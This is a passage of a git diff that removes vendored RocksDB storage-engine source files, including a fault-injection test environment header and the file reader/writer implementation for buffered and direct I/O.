-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-// This test uses a custom Env to keep track of the state of a filesystem as of
-// the last "sync". It then checks for data loss errors by purposely dropping
-// file data (or entire files) not protected by a "sync".
-
-#ifndef UTIL_FAULT_INJECTION_TEST_ENV_H_
-#define UTIL_FAULT_INJECTION_TEST_ENV_H_
-
-#include <map>
-#include <set>
-#include <string>
-
-#include "db/version_set.h"
-#include "env/mock_env.h"
-#include "rocksdb/db.h"
-#include "rocksdb/env.h"
-#include "util/filename.h"
-#include "util/mutexlock.h"
-#include "util/random.h"
-
-namespace rocksdb {
-
-class TestWritableFile;
-class FaultInjectionTestEnv;
-
-struct FileState {
-  std::string filename_;
-  ssize_t pos_;
-  ssize_t pos_at_last_sync_;
-  ssize_t pos_at_last_flush_;
-
-  explicit FileState(const std::string& filename)
-      : filename_(filename),
-        pos_(-1),
-        pos_at_last_sync_(-1),
-        pos_at_last_flush_(-1) {}
-
-  FileState() : pos_(-1), pos_at_last_sync_(-1), pos_at_last_flush_(-1) {}
-
-  bool IsFullySynced() const { return pos_ <= 0 || pos_ == pos_at_last_sync_; }
-
-  Status DropUnsyncedData(Env* env) const;
-
-  Status DropRandomUnsyncedData(Env* env, Random* rand) const;
-};
-
-// A wrapper around WritableFileWriter* file
-// is written to or sync'ed.
-class TestWritableFile : public WritableFile {
- public:
-  explicit TestWritableFile(const std::string& fname,
-                            unique_ptr<WritableFile>&& f,
-                            FaultInjectionTestEnv* env);
-  virtual ~TestWritableFile();
-  virtual Status Append(const Slice& data) override;
-  virtual Status Truncate(uint64_t size) override {
-    return target_->Truncate(size);
-  }
-  virtual Status Close() override;
-  virtual Status Flush() override;
-  virtual Status Sync() override;
-  virtual bool IsSyncThreadSafe() const override { return true; }
-
- private:
-  FileState state_;
-  unique_ptr<WritableFile> target_;
-  bool writable_file_opened_;
-  FaultInjectionTestEnv* env_;
-};
-
-class TestDirectory : public Directory {
- public:
-  explicit TestDirectory(FaultInjectionTestEnv* env, std::string dirname,
-                         Directory* dir)
-      : env_(env), dirname_(dirname), dir_(dir) {}
-  ~TestDirectory() {}
-
-  virtual Status Fsync() override;
-
- private:
-  FaultInjectionTestEnv* env_;
-  std::string dirname_;
-  unique_ptr<Directory> dir_;
-};
-
-class FaultInjectionTestEnv : public EnvWrapper {
- public:
-  explicit FaultInjectionTestEnv(Env* base)
-      : EnvWrapper(base), filesystem_active_(true) {}
-  virtual ~FaultInjectionTestEnv() {}
-
-  Status NewDirectory(const std::string& name,
-                      unique_ptr<Directory>* result) override;
-
-  Status NewWritableFile(const std::string& fname,
-                         unique_ptr<WritableFile>* result,
-                         const EnvOptions& soptions) override;
-
-  virtual Status DeleteFile(const std::string& f) override;
-
-  virtual Status RenameFile(const std::string& s,
-                            const std::string& t) override;
-
-  void WritableFileClosed(const FileState& state);
-
-  // For every file that is not fully synced, make a call to `func` with
-  // FileState of the file as the parameter.
-  Status DropFileData(std::function<Status(Env*, FileState)> func);
-
-  Status DropUnsyncedFileData();
-
-  Status DropRandomUnsyncedFileData(Random* rnd);
-
-  Status DeleteFilesCreatedAfterLastDirSync();
-
-  void ResetState();
-
-  void UntrackFile(const std::string& f);
-
-  void SyncDir(const std::string& dirname) {
-    MutexLock l(&mutex_);
-    dir_to_new_files_since_last_sync_.erase(dirname);
-  }
-
-  // Setting the filesystem to inactive is the test equivalent to simulating a
-  // system reset. Setting to inactive will freeze our saved filesystem state so
-  // that it will stop being recorded. It can then be reset back to the state at
-  // the time of the reset.
-  bool IsFilesystemActive() {
-    MutexLock l(&mutex_);
-    return filesystem_active_;
-  }
-  void SetFilesystemActiveNoLock(bool active) { filesystem_active_ = active; }
-  void SetFilesystemActive(bool active) {
-    MutexLock l(&mutex_);
-    SetFilesystemActiveNoLock(active);
-  }
-  void AssertNoOpenFile() { assert(open_files_.empty()); }
-
- private:
-  port::Mutex mutex_;
-  std::map<std::string, FileState> db_file_state_;
-  std::set<std::string> open_files_;
-  std::unordered_map<std::string, std::set<std::string>>
-      dir_to_new_files_since_last_sync_;
-  bool filesystem_active_;  // Record flushes, syncs, writes
-};
-
-}  // namespace rocksdb
-
-#endif  // UTIL_FAULT_INJECTION_TEST_ENV_H_
diff --git a/thirdparty/rocksdb/util/file_reader_writer.cc b/thirdparty/rocksdb/util/file_reader_writer.cc
deleted file mode 100644
index f46b78f..0000000
--- a/thirdparty/rocksdb/util/file_reader_writer.cc
+++ /dev/null
@@ -1,649 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#include "util/file_reader_writer.h"
-
-#include <algorithm>
-#include <mutex>
-
-#include "monitoring/histogram.h"
-#include "monitoring/iostats_context_imp.h"
-#include "port/port.h"
-#include "util/random.h"
-#include "util/rate_limiter.h"
-#include "util/sync_point.h"
-
-namespace rocksdb {
-
-#ifndef NDEBUG
-namespace {
-bool IsFileSectorAligned(const size_t off, size_t sector_size) {
-  return off % sector_size == 0;
-}
-}
-#endif
-
-Status SequentialFileReader::Read(size_t n, Slice* result, char* scratch) {
-  Status s;
-  if (use_direct_io()) {
-#ifndef ROCKSDB_LITE
-    size_t offset = offset_.fetch_add(n);
-    size_t alignment = file_->GetRequiredBufferAlignment();
-    size_t aligned_offset = TruncateToPageBoundary(alignment, offset);
-    size_t offset_advance = offset - aligned_offset;
-    size_t size = Roundup(offset + n, alignment) - aligned_offset;
-    size_t r = 0;
-    AlignedBuffer buf;
-    buf.Alignment(alignment);
-    buf.AllocateNewBuffer(size);
-    Slice tmp;
-    s = file_->PositionedRead(aligned_offset, size, &tmp, buf.BufferStart());
-    if (s.ok() && offset_advance < tmp.size()) {
-      buf.Size(tmp.size());
-      r = buf.Read(scratch, offset_advance,
-                   std::min(tmp.size() - offset_advance, n));
-    }
-    *result = Slice(scratch, r);
-#endif  // !ROCKSDB_LITE
-  } else {
-    s = file_->Read(n, result, scratch);
-  }
-  IOSTATS_ADD(bytes_read, result->size());
-  return s;
-}
-
-
-Status SequentialFileReader::Skip(uint64_t n) {
-#ifndef ROCKSDB_LITE
-  if (use_direct_io()) {
-    offset_ += n;
-    return Status::OK();
-  }
-#endif  // !ROCKSDB_LITE
-  return file_->Skip(n);
-}
-
-Status RandomAccessFileReader::Read(uint64_t offset, size_t n, Slice* result,
-                                    char* scratch) const {
-  Status s;
-  uint64_t elapsed = 0;
-  {
-    StopWatch sw(env_, stats_, hist_type_,
-                 (stats_ != nullptr) ? &elapsed : nullptr);
-    IOSTATS_TIMER_GUARD(read_nanos);
-    if (use_direct_io()) {
-#ifndef ROCKSDB_LITE
-      size_t alignment = file_->GetRequiredBufferAlignment();
-      size_t aligned_offset = TruncateToPageBoundary(alignment, offset);
-      size_t offset_advance = offset - aligned_offset;
-      size_t read_size = Roundup(offset + n, alignment) - aligned_offset;
-      AlignedBuffer buf;
-      buf.Alignment(alignment);
-      buf.AllocateNewBuffer(read_size);
-      while (buf.CurrentSize() < read_size) {
-        size_t allowed;
-        if (rate_limiter_ != nullptr) {
-          allowed = rate_limiter_->RequestToken(
-              buf.Capacity() - buf.CurrentSize(), buf.Alignment(),
-              Env::IOPriority::IO_LOW, stats_, RateLimiter::OpType::kRead);
-        } else {
-          assert(buf.CurrentSize() == 0);
-          allowed = read_size;
-        }
-        Slice tmp;
-        s = file_->Read(aligned_offset + buf.CurrentSize(), allowed, &tmp,
-                        buf.Destination());
-        buf.Size(buf.CurrentSize() + tmp.size());
-        if (!s.ok() || tmp.size() < allowed) {
-          break;
-        }
-      }
-      size_t res_len = 0;
-      if (s.ok() && offset_advance < buf.CurrentSize()) {
-        res_len = buf.Read(scratch, offset_advance,
-                           std::min(buf.CurrentSize() - offset_advance, n));
-      }
-      *result = Slice(scratch, res_len);
-#endif  // !ROCKSDB_LITE
-    } else {
-      size_t pos = 0;
-      const char* res_scratch = nullptr;
-      while (pos < n) {
-        size_t allowed;
-        if (for_compaction_ && rate_limiter_ != nullptr) {
-          allowed = rate_limiter_->RequestToken(n - pos, 0 /* alignment */,
-                                                Env::IOPriority::IO_LOW, stats_,
-                                                RateLimiter::OpType::kRead);
-        } else {
-          allowed = n;
-        }
-        Slice tmp_result;
-        s = file_->Read(offset + pos, allowed, &tmp_result, scratch + pos);
-        if (res_scratch == nullptr) {
-          // we can't simply use `scratch` because reads of mmap'd files return
-          // data in a different buffer.
-          res_scratch = tmp_result.data();
-        } else {
-          // make sure chunks are inserted contiguously into `res_scratch`.
-          assert(tmp_result.data() == res_scratch + pos);
-        }
-        pos += tmp_result.size();
-        if (!s.ok() || tmp_result.size() < allowed) {
-          break;
-        }
-      }
-      *result = Slice(res_scratch, s.ok() ? pos : 0);
-    }
-    IOSTATS_ADD_IF_POSITIVE(bytes_read, result->size());
-  }
-  if (stats_ != nullptr && file_read_hist_ != nullptr) {
-    file_read_hist_->Add(elapsed);
-  }
-  return s;
-}
-
-Status WritableFileWriter::Append(const Slice& data) {
-  const char* src = data.data();
-  size_t left = data.size();
-  Status s;
-  pending_sync_ = true;
-
-  TEST_KILL_RANDOM("WritableFileWriter::Append:0",
-                   rocksdb_kill_odds * REDUCE_ODDS2);
-
-  {
-    IOSTATS_TIMER_GUARD(prepare_write_nanos);
-    TEST_SYNC_POINT("WritableFileWriter::Append:BeforePrepareWrite");
-    writable_file_->PrepareWrite(static_cast<size_t>(GetFileSize()), left);
-  }
-
-  // See whether we need to enlarge the buffer to avoid the flush
-  if (buf_.Capacity() - buf_.CurrentSize() < left) {
-    for (size_t cap = buf_.Capacity();
-         cap < max_buffer_size_;  // There is still room to increase
-         cap *= 2) {
-      // See whether the next available size is large enough.
-      // Buffer will never be increased to more than max_buffer_size_.
-      size_t desired_capacity = std::min(cap * 2, max_buffer_size_);
-      if (desired_capacity - buf_.CurrentSize() >= left ||
-          (use_direct_io() && desired_capacity == max_buffer_size_)) {
-        buf_.AllocateNewBuffer(desired_capacity, true);
-        break;
-      }
-    }
-  }
-
-  // Flush only when buffered I/O
-  if (!use_direct_io() && (buf_.Capacity() - buf_.CurrentSize()) < left) {
-    if (buf_.CurrentSize() > 0) {
-      s = Flush();
-      if (!s.ok()) {
-        return s;
-      }
-    }
-    assert(buf_.CurrentSize() == 0);
-  }
-
-  // We never write directly to disk with direct I/O on.
-  // or we simply use it for its original purpose to accumulate many small
-  // chunks
-  if (use_direct_io() || (buf_.Capacity() >= left)) {
-    while (left > 0) {
-      size_t appended = buf_.Append(src, left);
-      left -= appended;
-      src += appended;
-
-      if (left > 0) {
-        s = Flush();
-        if (!s.ok()) {
-          break;
-        }
-      }
-    }
-  } else {
-    // Writing directly to file bypassing the buffer
-    assert(buf_.CurrentSize() == 0);
-    s = WriteBuffered(src, left);
-  }
-
-  TEST_KILL_RANDOM("WritableFileWriter::Append:1", rocksdb_kill_odds);
-  if (s.ok()) {
-    filesize_ += data.size();
-  }
-  return s;
-}
-
-Status WritableFileWriter::Close() {
-
-  // Do not quit immediately on failure the file MUST be closed
-  Status s;
-
-  // Possible to close it twice now as we MUST close
-  // in __dtor, simply flushing is not enough
-  // Windows when pre-allocating does not fill with zeros
-  // also with unbuffered access we also set the end of data.
-  if (!writable_file_) {
-    return s;
-  }
-
-  s = Flush();  // flush cache to OS
-
-  Status interim;
-  // In direct I/O mode we write whole pages so
-  // we need to let the file know where data ends.
-  if (use_direct_io()) {
-    interim = writable_file_->Truncate(filesize_);
-    if (!interim.ok() && s.ok()) {
-      s = interim;
-    }
-  }
-
-  TEST_KILL_RANDOM("WritableFileWriter::Close:0", rocksdb_kill_odds);
-  interim = writable_file_->Close();
-  if (!interim.ok() && s.ok()) {
-    s = interim;
-  }
-
-  writable_file_.reset();
-  TEST_KILL_RANDOM("WritableFileWriter::Close:1", rocksdb_kill_odds);
-
-  return s;
-}
-
-// write out the cached data to the OS cache or storage if direct I/O
-// enabled
-Status WritableFileWriter::Flush() {
-  Status s;
-  TEST_KILL_RANDOM("WritableFileWriter::Flush:0",
-                   rocksdb_kill_odds * REDUCE_ODDS2);
-
-  if (buf_.CurrentSize() > 0) {
-    if (use_direct_io()) {
-#ifndef ROCKSDB_LITE
-      s = WriteDirect();
-#endif  // !ROCKSDB_LITE
-    } else {
-      s = WriteBuffered(buf_.BufferStart(), buf_.CurrentSize());
-    }
-    if (!s.ok()) {
-      return s;
-    }
-  }
-
-  s = writable_file_->Flush();
-
-  if (!s.ok()) {
-    return s;
-  }
-
-  // sync OS cache to disk for every bytes_per_sync_
-  // TODO: give log file and sst file different options (log
-  // files could be potentially cached in OS for their whole
-  // life time, thus we might not want to flush at all).
-
-  // We try to avoid sync to the last 1MB of data. For two reasons:
-  // (1) avoid rewrite the same page that is modified later.
-  // (2) for older version of OS, write can block while writing out
-  //     the page.
-  // Xfs does neighbor page flushing outside of the specified ranges. We
-  // need to make sure sync range is far from the write offset.
-  if (!use_direct_io() && bytes_per_sync_) {
-    const uint64_t kBytesNotSyncRange = 1024 * 1024;  // recent 1MB is not synced.
-    const uint64_t kBytesAlignWhenSync = 4 * 1024;    // Align 4KB.
-    if (filesize_ > kBytesNotSyncRange) {
-      uint64_t offset_sync_to = filesize_ - kBytesNotSyncRange;
-      offset_sync_to -= offset_sync_to % kBytesAlignWhenSync;
-      assert(offset_sync_to >= last_sync_size_);
-      if (offset_sync_to > 0 &&
-          offset_sync_to - last_sync_size_ >= bytes_per_sync_) {
-        s = RangeSync(last_sync_size_, offset_sync_to - last_sync_size_);
-        last_sync_size_ = offset_sync_to;
-      }
-    }
-  }
-
-  return s;
-}
-
-Status WritableFileWriter::Sync(bool use_fsync) {
-  Status s = Flush();
-  if (!s.ok()) {
-    return s;
-  }
-  TEST_KILL_RANDOM("WritableFileWriter::Sync:0", rocksdb_kill_odds);
-  if (!use_direct_io() && pending_sync_) {
-    s = SyncInternal(use_fsync);
-    if (!s.ok()) {
-      return s;
-    }
-  }
-  TEST_KILL_RANDOM("WritableFileWriter::Sync:1", rocksdb_kill_odds);
-  pending_sync_ = false;
-  return Status::OK();
-}
-
-Status WritableFileWriter::SyncWithoutFlush(bool use_fsync) {
-  if (!writable_file_->IsSyncThreadSafe()) {
-    return Status::NotSupported(
-      "Can't WritableFileWriter::SyncWithoutFlush() because "
-      "WritableFile::IsSyncThreadSafe() is false");
-  }
-  TEST_SYNC_POINT("WritableFileWriter::SyncWithoutFlush:1");
-  Status s = SyncInternal(use_fsync);
-  TEST_SYNC_POINT("WritableFileWriter::SyncWithoutFlush:2");
-  return s;
-}
-
-Status WritableFileWriter::SyncInternal(bool use_fsync) {
-  Status s;
-  IOSTATS_TIMER_GUARD(fsync_nanos);
-  TEST_SYNC_POINT("WritableFileWriter::SyncInternal:0");
-  if (use_fsync) {
-    s = writable_file_->Fsync();
-  } else {
-    s = writable_file_->Sync();
-  }
-  return s;
-}
-
-Status WritableFileWriter::RangeSync(uint64_t offset, uint64_t nbytes) {
-  IOSTATS_TIMER_GUARD(range_sync_nanos);
-  TEST_SYNC_POINT("WritableFileWriter::RangeSync:0");
-  return writable_file_->RangeSync(offset, nbytes);
-}
-
-// This method writes to disk the specified data and makes use of the rate
-// limiter if available
-Status WritableFileWriter::WriteBuffered(const char* data, size_t size) {
-  Status s;
-  assert(!use_direct_io());
-  const char* src = data;
-  size_t left = size;
-
-  while (left > 0) {
-    size_t allowed;
-    if (rate_limiter_ != nullptr) {
-      allowed = rate_limiter_->RequestToken(
-          left, 0 /* alignment */, writable_file_->GetIOPriority(), stats_,
-          RateLimiter::OpType::kWrite);
-    } else {
-      allowed = left;
-    }
-
-    {
-      IOSTATS_TIMER_GUARD(write_nanos);
-      TEST_SYNC_POINT("WritableFileWriter::Flush:BeforeAppend");
-      s = writable_file_->Append(Slice(src, allowed));
-      if (!s.ok()) {
-        return s;
-      }
-    }
-
-    IOSTATS_ADD(bytes_written, allowed);
-    TEST_KILL_RANDOM("WritableFileWriter::WriteBuffered:0", rocksdb_kill_odds);
-
-    left -= allowed;
-    src += allowed;
-  }
-  buf_.Size(0);
-  return s;
-}
-
-
-// This flushes the accumulated data in the buffer. We pad data with zeros if
-// necessary to the whole page.
-// However, during automatic flushes padding would not be necessary.
-// We always use RateLimiter if available. We move (Refit) any buffer bytes
-// that are left over the
-// whole number of pages to be written again on the next flush because we can
-// only write on aligned
-// offsets.
-#ifndef ROCKSDB_LITE
-Status WritableFileWriter::WriteDirect() {
-  assert(use_direct_io());
-  Status s;
-  const size_t alignment = buf_.Alignment();
-  assert((next_write_offset_ % alignment) == 0);
-
-  // Calculate whole page final file advance if all writes succeed
-  size_t file_advance =
-    TruncateToPageBoundary(alignment, buf_.CurrentSize());
-
-  // Calculate the leftover tail, we write it here padded with zeros BUT we
-  // will write
-  // it again in the future either on Close() OR when the current whole page
-  // fills out
-  size_t leftover_tail = buf_.CurrentSize() - file_advance;
-
-  // Round up and pad
-  buf_.PadToAlignmentWith(0);
-
-  const char* src = buf_.BufferStart();
-  uint64_t write_offset = next_write_offset_;
-  size_t left = buf_.CurrentSize();
-
-  while (left > 0) {
-    // Check how much is allowed
-    size_t size;
-    if (rate_limiter_ != nullptr) {
-      size = rate_limiter_->RequestToken(left, buf_.Alignment(),
-                                         writable_file_->GetIOPriority(),
-                                         stats_, RateLimiter::OpType::kWrite);
-    } else {
-      size = left;
-    }
-
-    {
-      IOSTATS_TIMER_GUARD(write_nanos);
-      TEST_SYNC_POINT("WritableFileWriter::Flush:BeforeAppend");
-      // direct writes must be positional
-      s = writable_file_->PositionedAppend(Slice(src, size), write_offset);
-      if (!s.ok()) {
-        buf_.Size(file_advance + leftover_tail);
-        return s;
-      }
-    }
-
-    IOSTATS_ADD(bytes_written, size);
-    left -= size;
-    src += size;
-    write_offset += size;
-    assert((next_write_offset_ % alignment) == 0);
-  }
-
-  if (s.ok()) {
-    // Move the tail to the beginning of the buffer
-    // This never happens during normal Append but rather during
-    // explicit call to Flush()/Sync() or Close()
-    buf_.RefitTail(file_advance, leftover_tail);
-    // This is where we start writing next time which may or not be
-    // the actual file size on disk. They match if the buffer size
-    // is a multiple of whole pages otherwise filesize_ is leftover_tail
-    // behind
-    next_write_offset_ += file_advance;
-  }
-  return s;
-}
-#endif  // !ROCKSDB_LITE
-
-namespace {
-class ReadaheadRandomAccessFile : public RandomAccessFile {
- public:
-  ReadaheadRandomAccessFile(std::unique_ptr<RandomAccessFile>&& file,
-                            size_t readahead_size)
-      : file_(std::move(file)),
-        alignment_(file_->GetRequiredBufferAlignment()),
-        readahead_size_(Roundup(readahead_size, alignment_)),
-        buffer_(),
-        buffer_offset_(0),
-        buffer_len_(0) {
-
-    buffer_.Alignment(alignment_);
-    buffer_.AllocateNewBuffer(readahead_size_);
-  }
-
- ReadaheadRandomAccessFile(const ReadaheadRandomAccessFile&) = delete;
-
- ReadaheadRandomAccessFile& operator=(const ReadaheadRandomAccessFile&) = delete;
-
-  virtual Status Read(uint64_t offset, size_t n, Slice* result,
-                      char* scratch) const override {
-
-    if (n + alignment_ >= readahead_size_) {
-      return file_->Read(offset, n, result, scratch);
-    }
-
-    std::unique_lock<std::mutex> lk(lock_);
-
-    size_t cached_len = 0;
-    // Check if there is a cache hit, means that [offset, offset + n) is either
-    // completely or partially in the buffer
-    // If it's completely cached, including end of file case when offset + n is
-    // greater than EOF, return
-    if (TryReadFromCache(offset, n, &cached_len, scratch) &&
-        (cached_len == n ||
-         // End of file
-         buffer_len_ < readahead_size_)) {
-      *result = Slice(scratch, cached_len);
-      return Status::OK();
-    }
-    size_t advanced_offset = offset + cached_len;
-    // In the case of cache hit advanced_offset is already aligned, means that
-    // chunk_offset equals to advanced_offset
-    size_t chunk_offset = TruncateToPageBoundary(alignment_, advanced_offset);
-    Slice readahead_result;
-
-    Status s = ReadIntoBuffer(chunk_offset, readahead_size_);
-    if (s.ok()) {
-      // In the case of cache miss, i.e. when cached_len equals 0, an offset can
-      // exceed the file end position, so the following check is required
-      if (advanced_offset < chunk_offset + buffer_len_) {
-        // In the case of cache miss, the first chunk_padding bytes in buffer_
-        // are
-        // stored for alignment only and must be skipped
-        size_t chunk_padding = advanced_offset - chunk_offset;
-        auto remaining_len =
-            std::min(buffer_len_ - chunk_padding, n - cached_len);
-        memcpy(scratch + cached_len, buffer_.BufferStart() + chunk_padding,
-               remaining_len);
-        *result = Slice(scratch, cached_len + remaining_len);
-      } else {
-        *result = Slice(scratch, cached_len);
-      }
-    }
-    return s;
-  }
-
-  virtual Status Prefetch(uint64_t offset, size_t n) override {
-    size_t prefetch_offset = TruncateToPageBoundary(alignment_, offset);
-    if (prefetch_offset == buffer_offset_) {
-      return Status::OK();
-    }
-    return ReadIntoBuffer(prefetch_offset,
-                          Roundup(offset + n, alignment_) - prefetch_offset);
-  }
-
-  virtual size_t GetUniqueId(char* id, size_t max_size) const override {
-    return file_->GetUniqueId(id, max_size);
-  }
-
-  virtual void Hint(AccessPattern pattern) override { file_->Hint(pattern); }
-
-  virtual Status InvalidateCache(size_t offset, size_t length) override {
-    return file_->InvalidateCache(offset, length);
-  }
-
-  virtual bool use_direct_io() const override {
-    return file_->use_direct_io();
-  }
-
- private:
-  bool TryReadFromCache(uint64_t offset, size_t n, size_t* cached_len,
-                         char* scratch) const {
-    if (offset < buffer_offset_ || offset >= buffer_offset_ + buffer_len_) {
-      *cached_len = 0;
-      return false;
-    }
-    uint64_t offset_in_buffer = offset - buffer_offset_;
-    *cached_len =
-        std::min(buffer_len_ - static_cast<size_t>(offset_in_buffer), n);
-    memcpy(scratch, buffer_.BufferStart() + offset_in_buffer, *cached_len);
-    return true;
-  }
-
-  Status ReadIntoBuffer(uint64_t offset, size_t n) const {
-    if (n > buffer_.Capacity()) {
-      n = buffer_.Capacity();
-    }
-    assert(IsFileSectorAligned(offset, alignment_));
-    assert(IsFileSectorAligned(n, alignment_));
-    Slice result;
-    Status s = file_->Read(offset, n, &result, buffer_.BufferStart());
-    if (s.ok()) {
-      buffer_offset_ = offset;
-      buffer_len_ = result.size();
-    }
-    return s;
-  }
-
-  std::unique_ptr<RandomAccessFile> file_;
-  const size_t alignment_;
-  size_t               readahead_size_;
-
-  mutable std::mutex lock_;
-  mutable AlignedBuffer buffer_;
-  mutable uint64_t buffer_offset_;
-  mutable size_t buffer_len_;
-};
-}  // namespace
-
-Status FilePrefetchBuffer::Prefetch(RandomAccessFileReader* reader,
-                                    uint64_t offset, size_t n) {
-  size_t alignment = reader->file()->GetRequiredBufferAlignment();
-  uint64_t roundup_offset = Roundup(offset, alignment);
-  uint64_t roundup_len = Roundup(n, alignment);
-  buffer_.Alignment(alignment);
-  buffer_.AllocateNewBuffer(roundup_len);
-
-  Slice result;
-  Status s =
-      reader->Read(roundup_offset, roundup_len, &result, buffer_.BufferStart());
-  if (s.ok()) {
-    buffer_offset_ = roundup_offset;
-    buffer_len_ = result.size();
-  }
-  return s;
-}
-
-bool FilePrefetchBuffer::TryReadFromCache(uint64_t offset, size_t n,
-                                          Slice* result) const {
-  if (offset < buffer_offset_ || offset + n > buffer_offset_ + buffer_len_) {
-    return false;
-  }
-  uint64_t offset_in_buffer = offset - buffer_offset_;
-  *result = Slice(buffer_.BufferStart() + offset_in_buffer, n);
-  return true;
-}
-
-std::unique_ptr<RandomAccessFile> NewReadaheadRandomAccessFile(
-    std::unique_ptr<RandomAccessFile>&& file, size_t readahead_size) {
-  std::unique_ptr<RandomAccessFile> result(
-    new ReadaheadRandomAccessFile(std::move(file), readahead_size));
-  return result;
-}
-
-Status NewWritableFile(Env* env, const std::string& fname,
-                       unique_ptr<WritableFile>* result,
-                       const EnvOptions& options) {
-  Status s = env->NewWritableFile(fname, result, options);
-  TEST_KILL_RANDOM("NewWritableFile:0", rocksdb_kill_odds * REDUCE_ODDS2);
-  return s;
-}
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/util/file_reader_writer.h b/thirdparty/rocksdb/util/file_reader_writer.h
deleted file mode 100644
index 9be6924..0000000
--- a/thirdparty/rocksdb/util/file_reader_writer.h
+++ /dev/null
@@ -1,213 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-#pragma once
-#include <atomic>
-#include <string>
-#include "port/port.h"
-#include "rocksdb/env.h"
-#include "rocksdb/rate_limiter.h"
-#include "util/aligned_buffer.h"
-
-namespace rocksdb {
-
-class Statistics;
-class HistogramImpl;
-
-std::unique_ptr<RandomAccessFile> NewReadaheadRandomAccessFile(
-  std::unique_ptr<RandomAccessFile>&& file, size_t readahead_size);
-
-class SequentialFileReader {
- private:
-  std::unique_ptr<SequentialFile> file_;
-  std::atomic<size_t> offset_;  // read offset
-
- public:
-  explicit SequentialFileReader(std::unique_ptr<SequentialFile>&& _file)
-      : file_(std::move(_file)), offset_(0) {}
-
-  SequentialFileReader(SequentialFileReader&& o) ROCKSDB_NOEXCEPT {
-    *this = std::move(o);
-  }
-
-  SequentialFileReader& operator=(SequentialFileReader&& o) ROCKSDB_NOEXCEPT {
-    file_ = std::move(o.file_);
-    return *this;
-  }
-
-  SequentialFileReader(const SequentialFileReader&) = delete;
-  SequentialFileReader& operator=(const SequentialFileReader&) = delete;
-
-  Status Read(size_t n, Slice* result, char* scratch);
-
-  Status Skip(uint64_t n);
-
-  void Rewind();
-
-  SequentialFile* file() { return file_.get(); }
-
-  bool use_direct_io() const { return file_->use_direct_io(); }
-};
-
-class RandomAccessFileReader {
- private:
-  std::unique_ptr<RandomAccessFile> file_;
-  std::string     file_name_;
-  Env*            env_;
-  Statistics*     stats_;
-  uint32_t        hist_type_;
-  HistogramImpl*  file_read_hist_;
-  RateLimiter* rate_limiter_;
-  bool for_compaction_;
-
- public:
-  explicit RandomAccessFileReader(std::unique_ptr<RandomAccessFile>&& raf,
-                                  std::string _file_name,
-                                  Env* env = nullptr,
-                                  Statistics* stats = nullptr,
-                                  uint32_t hist_type = 0,
-                                  HistogramImpl* file_read_hist = nullptr,
-                                  RateLimiter* rate_limiter = nullptr,
-                                  bool for_compaction = false)
-      : file_(std::move(raf)),
-        file_name_(std::move(_file_name)),
-        env_(env),
-        stats_(stats),
-        hist_type_(hist_type),
-        file_read_hist_(file_read_hist),
-        rate_limiter_(rate_limiter),
-        for_compaction_(for_compaction) {}
-
-  RandomAccessFileReader(RandomAccessFileReader&& o) ROCKSDB_NOEXCEPT {
-    *this = std::move(o);
-  }
-
-  RandomAccessFileReader& operator=(RandomAccessFileReader&& o)
-      ROCKSDB_NOEXCEPT {
-    file_ = std::move(o.file_);
-    env_ = std::move(o.env_);
-    stats_ = std::move(o.stats_);
-    hist_type_ = std::move(o.hist_type_);
-    file_read_hist_ = std::move(o.file_read_hist_);
-    rate_limiter_ = std::move(o.rate_limiter_);
-    for_compaction_ = std::move(o.for_compaction_);
-    return *this;
-  }
-
-  RandomAccessFileReader(const RandomAccessFileReader&) = delete;
-  RandomAccessFileReader& operator=(const RandomAccessFileReader&) = delete;
-
-  Status Read(uint64_t offset, size_t n, Slice* result, char* scratch) const;
-
-  Status Prefetch(uint64_t offset, size_t n) const {
-    return file_->Prefetch(offset, n);
-  }
-
-  RandomAccessFile* file() { return file_.get(); }
-
-  std::string file_name() const { return file_name_; }
-
-  bool use_direct_io() const { return file_->use_direct_io(); }
-};
-
-// Use posix write to write data to a file.
-class WritableFileWriter {
- private:
-  std::unique_ptr<WritableFile> writable_file_;
-  AlignedBuffer           buf_;
-  size_t                  max_buffer_size_;
-  // Actually written data size can be used for truncate
-  // not counting padding data
-  uint64_t                filesize_;
-#ifndef ROCKSDB_LITE
-  // This is necessary when we use unbuffered access
-  // and writes must happen on aligned offsets
-  // so we need to go back and write that page again
-  uint64_t                next_write_offset_;
-#endif  // ROCKSDB_LITE
-  bool                    pending_sync_;
-  uint64_t                last_sync_size_;
-  uint64_t                bytes_per_sync_;
-  RateLimiter*            rate_limiter_;
-  Statistics* stats_;
-
- public:
-  WritableFileWriter(std::unique_ptr<WritableFile>&& file,
-                     const EnvOptions& options, Statistics* stats = nullptr)
-      : writable_file_(std::move(file)),
-        buf_(),
-        max_buffer_size_(options.writable_file_max_buffer_size),
-        filesize_(0),
-#ifndef ROCKSDB_LITE
-        next_write_offset_(0),
-#endif  // ROCKSDB_LITE
-        pending_sync_(false),
-        last_sync_size_(0),
-        bytes_per_sync_(options.bytes_per_sync),
-        rate_limiter_(options.rate_limiter),
-        stats_(stats) {
-    buf_.Alignment(writable_file_->GetRequiredBufferAlignment());
-    buf_.AllocateNewBuffer(std::min((size_t)65536, max_buffer_size_));
-  }
-
-  WritableFileWriter(const WritableFileWriter&) = delete;
-
-  WritableFileWriter& operator=(const WritableFileWriter&) = delete;
-
-  ~WritableFileWriter() { Close(); }
-
-  Status Append(const Slice& data);
-
-  Status Flush();
-
-  Status Close();
-
-  Status Sync(bool use_fsync);
-
-  // Sync only the data that was already Flush()ed. Safe to call concurrently
-  // with Append() and Flush(). If !writable_file_->IsSyncThreadSafe(),
-  // returns NotSupported status.
-  Status SyncWithoutFlush(bool use_fsync);
-
-  uint64_t GetFileSize() { return filesize_; }
-
-  Status InvalidateCache(size_t offset, size_t length) {
-    return writable_file_->InvalidateCache(offset, length);
-  }
-
